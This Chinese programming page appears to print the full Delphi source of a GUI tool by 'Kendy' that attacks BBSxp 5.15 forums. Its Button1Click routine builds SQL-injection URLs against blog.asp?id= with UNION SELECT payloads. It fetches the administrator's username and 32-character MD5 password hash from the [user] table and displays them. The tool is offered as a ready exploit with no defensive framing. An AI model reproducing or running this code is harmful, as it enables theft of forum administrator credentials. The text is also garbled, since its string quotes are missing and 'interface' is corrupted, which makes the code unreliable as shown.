“BBSxp 5.15”暴库工具源码

作者：Kendy
unit Unit1;
inte易做图ce
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,
  IdHTTP, StdCtrls, IdAntiFreezeBase, IdAntiFreeze, WinHTTP, ComCtrls,
  ExtCtrls, WinSkinData;
type
  TForm1 = class(TForm)
    Edit1: TEdit;
    Edit2: TEdit;
    Edit3: TEdit;
    Button1: TButton;
    IdHTTP1: TIdHTTP;
    WinHTTP1: TWinHTTP;
    Label1: TLabel;
    Label2: TLabel;
    Label3: TLabel;
    Bevel1: TBevel;
    Button2: TButton;
    StatusBar1: TStatusBar;
    procedure Button1Click(Sender: TObject);
    procedure WinHTTP1Done(Sender: TObject; const ContentType: String;
      FileSize: Integer; Stream: TStream);
    procedure WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer;
      Stream: TStream);
    procedure Button2Click(Sender: TObject);
    procedure Edit3Change(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;
var
  Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var
  s1:string;
  url1,url2:string;
  i:integer;
begin
  if edit1.Text = then
    begin
      showmessage(  请输入网址先！);
      exit;
    end;
  url1:=edit1.Text+blog.asp?id=1%20union%20select%20top%201%201,[username],1,1,1,1,1%20from%20[user]%20where%20membercode=5;
  url2:=edit1.Text+blog.asp?id=1%20union%20select%20top%201%201,[userpass],1,1,1,1,1%20from%20[user]%20where%20membercode=5;
  //---------------------------暴账号（idHTTP）-----------------------
  try
    Form1.Caption :=正在暴取账号......;
    s1:=idHTTP1.Get(url1);
    if pos(username,s1)<>0 then
      begin
        i:=pos(username,s1);
        s1:=copy(s1,i+9,15);  //账号位数不固定，但最长不得超过12位
        i:=pos(">,s1);
        s1:=copy(s1,1,i-1);  //取得账号
        edit2.Text :=s1;
        idHTTP1.Disconnect ;  //断开连接
      end
    else
      begin
        Form1.Caption :=[BBSxp 5.15]暴库工具 ;
        showmessage(暴库失败！可能不存在此漏洞！);
        idHTTP1.Disconnect ;  //断开连接
        exit;
      end;
  except
    Form1.Caption :=[BBSxp 5.15]暴库工具 ;
    showmessage(网络超时或其他错误！);
    idHTTP1.Disconnect ;
    exit;  //如果错误就退出 ，不继续下面的代码
  end;
 //----------暴账号完毕-------------
 //----如果暴账号成功，那暴密码肯定也成功，则继续下面的代码
 //-----------------------------暴密码（WinHTTP）------------------------
 Form1.Caption :=正在暴取密码......;
 WinHTTP1.URL :=url2;
 WinHTTP1.Read;
 //-----接 WinHTTP1Done 和 WinHTTP1HTTPError----------
end;
//-------WinHTTP1Done 和 WinHTTP1HTTPError 的代码要一致，因为暴密码一般都是在Error状态下----
procedure TForm1.WinHTTP1Done(Sender: TObject; const ContentType: String;
  FileSize: Integer; Stream: TStream);
var
  s2:string;
  i:integer;
begin
  with Stream as TMemoryStream do
    begin
      SetLength(s2,size);
      Stream.Read(s2[1],size);
    end;
  if pos(username,s2)<>0 then
    begin
      i:=pos(username,s2);
      s2:=copy(s2,i+9,32); //这里为固定的32位MD5加密，可以直接取32个字符即得密码
      edit3.Text :=s2;
    end;
end;
procedure TForm1.WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer;
  Stream: TStream);
var
  s2:string;
  i:integer;
begin
  with Stream as TMemoryStream do
    begin
      SetLength(s2,size);
      Stream.Read(s2[1],size);
    end;
  if pos(username,s2)<>0 then
    begin
      i:=pos(username,s2);
      s2:=copy(s2,i+9,32); //这里为固定的32位MD5加密，可以直接取32个字符即得密码
      edit3.Text :=s2;
    end;
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
  close;
end;
procedure TForm1.Edit3Change(Sender: TObject);
begin
  Form1.Caption :=[BBSxp 5.15]暴库工具 ;
end;

end.
 

补充：综合编程 , 安全编程 ,

上一个：用批处理对MySQL进行数据操作
下一个：用Visual Basic为软件增加注册功能